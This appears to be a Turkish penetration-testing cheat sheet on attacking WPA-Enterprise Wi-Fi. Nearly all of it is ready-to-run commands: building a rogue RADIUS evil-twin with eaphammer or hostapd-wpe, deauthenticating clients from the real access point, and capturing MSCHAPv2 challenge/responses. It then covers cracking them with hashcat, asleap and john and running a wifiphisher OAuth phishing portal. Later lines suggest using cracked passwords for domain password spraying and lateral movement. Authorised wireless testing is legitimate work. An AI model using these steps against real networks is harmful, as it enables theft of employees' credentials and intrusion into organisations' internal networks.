Skip to content

WPA-Enterprise Saldırıları

802.1X difficulty: orta-zor

WPA-Enterprise (802.1X/EAP), ortak PSK yerine kullanıcı kimlikleriyle doğrulama yapar (genelde PEAP/EAP-TTLS + MSCHAPv2 veya EAP-TLS). En yaygın ofansif senaryo: sahte bir RADIUS/erişim noktası kurup, istemci sunucu sertifikasını doğrulamıyorsa MSCHAPv2 challenge/response yakalayıp offline kırmak veya netNTLM hash’i relay etmek.

PEAP / EAP-TTLS + MSCHAPv2 → rogue RADIUS + hashcat -m 5500 (en sık)
EAP-FAST → benzer; PAC/phase2 zayıf yapılandırma
EAP-TLS (istemci sertifikası) → sahte AP genelde kimlik alamaz; sertifika çalma ayrı yol
EAP-PWD / EAP-GTC → nadir; GTC düz metin riski

Keşifte airodump AUTH sütunu MGT gösterir; ESSID kurumsal SSID’dir.

Terminal window
sudo airodump-ng --band abg wlan0mon
- Monitor + AP mode (iki arayüz veya tek kart AP+deauth ayrımı)
- eaphammer veya hostapd-wpe + freeradius-wpe
- Hedef istemciler sertifika pin/validate etmiyor (BYOD, eski Windows, mobil)
- Yasal kapsam: kurumsal SSID üzerinde yazılı izin
  1. Sahte sertifika ve AP kur — aynı SSID + 802.1X:

    Terminal window
    eaphammer --cert-wizard
    Terminal window
    eaphammer -i wlan0 --channel 6 --auth wpa-eap \
    --essid "Kurumsal-WiFi" --creds
    Terminal window
    sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
  2. İstemciyi çek — gerçek AP’ye deauth; zayıf doğrulamalı istemci sahte sunucuya bağlanır:

    Terminal window
    sudo aireplay-ng --deauth 10 -a REAL_BSSID wlan1mon
    Terminal window
    sudo mdk4 wlan1mon d -B REAL_BSSID
  3. MSCHAPv2 challenge yakala — eaphammer/hostapd-wpe log’unda:

    username::challenge::response
    # veya asleap / john netntlm formatı
  4. Offline kır veya spray — yakalanan hash:

    Terminal window
    hashcat -m 5500 netntlm.txt rockyou.txt
    Terminal window
    hashcat -m 5500 netntlm.txt rockyou.txt -r rules/best64.rule
    Terminal window
    asleap -C challenge -R response -W wordlist.txt
    Terminal window
    john --format=netntlm netntlm.txt
Terminal window
sudo hostapd-wpe hostapd-wpe.conf
Terminal window
grep -i mschap /var/log/hostapd-wpe.log

Yakalanan kullanıcı adı çoğu zaman DOMAIN\user veya user@corp.local formundadır — iç ağda password spraying için doğrudan kullanılır.

Bazı istemciler birden fazla SSID profili tutar. Aynı ESSID ile:

1) WPA2-Enterprise rogue (kimlik avı)
2) Açık/captive portal twin (PSK/portal)
3) Gerçek AP'ye sürekli deauth

eaphammer karma (KARMA) + enterprise kombinasyonları:

Terminal window
eaphammer -i wlan0 --essid "Kurumsal-WiFi" --auth wpa-eap --creds --karma

Kimlik alamadığınızda (EAP-TLS) veya tamamlayıcı olarak:

Terminal window
eaphammer -i wlan0 --essid "Kurumsal-WiFi" --captive-portal
Terminal window
sudo wifiphisher -aI wlan0mon -e "Kurumsal-WiFi" -p oauth-login
Kırılan parola → domain password spray / VPN / OWA / Wi‑Fi yeniden bağlanma
username@corp → Kerberoast / AS-REP yoksa yine de lateral için değerli
Başarısız crack → netNTLM relay (ortama göre) veya wordlist zenginleştir (CeWL)
Terminal window
cewl https://www.corp.com -m 6 -w corp.txt
Terminal window
hashcat -m 5500 netntlm.txt corp.txt -r rules/best64.rule
İstemci sertifikayı doğruluyor / pin'liyor → bağlanmaz; kimlik gelmez
EAP-TLS only → rogue RADIUS yetmez
PMF + yönetilen cihaz → deauth zayıf; beklenen reconnect azalır
Yanlış kanal / zayıf sinyal → istemci gerçek AP'de kalır
Boş creds log → daha uzun deauth + doğru ESSID/şifreleme
Terminal window
airodump AUTH=MGT → ESSID kopyala
→ eaphammer --cert-wizard + --creds
→ deauth gerçek BSSID
→ MSCHAPv2 yakala → hashcat -m 5500
→ domain spray / iç ağ
EAP-TLS ortam → evil twin captive (yardımcı ağ) veya
cihaz/sertifika başka vektör (phishing, endpoint)